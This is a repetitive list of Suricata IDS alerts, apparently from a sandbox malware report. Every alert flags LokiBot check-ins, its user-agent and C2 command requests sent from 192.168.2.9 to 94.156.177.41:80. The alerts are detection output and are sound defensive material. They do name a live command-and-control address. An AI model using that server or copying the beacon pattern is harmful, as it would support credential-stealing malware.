Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49814 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50035 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49926 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50042 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50040 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49998 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49998 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49998 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50027 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50074 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50037 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50034 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49998 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50062 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49998 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50057 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50051 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49886 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50064 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50067 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49881 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50041 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:49960 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50070 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50021 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50054 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50065 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50039 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50061 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50030 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50025 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.9:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50071 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50073 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50073 -> 94.156.177.41:80
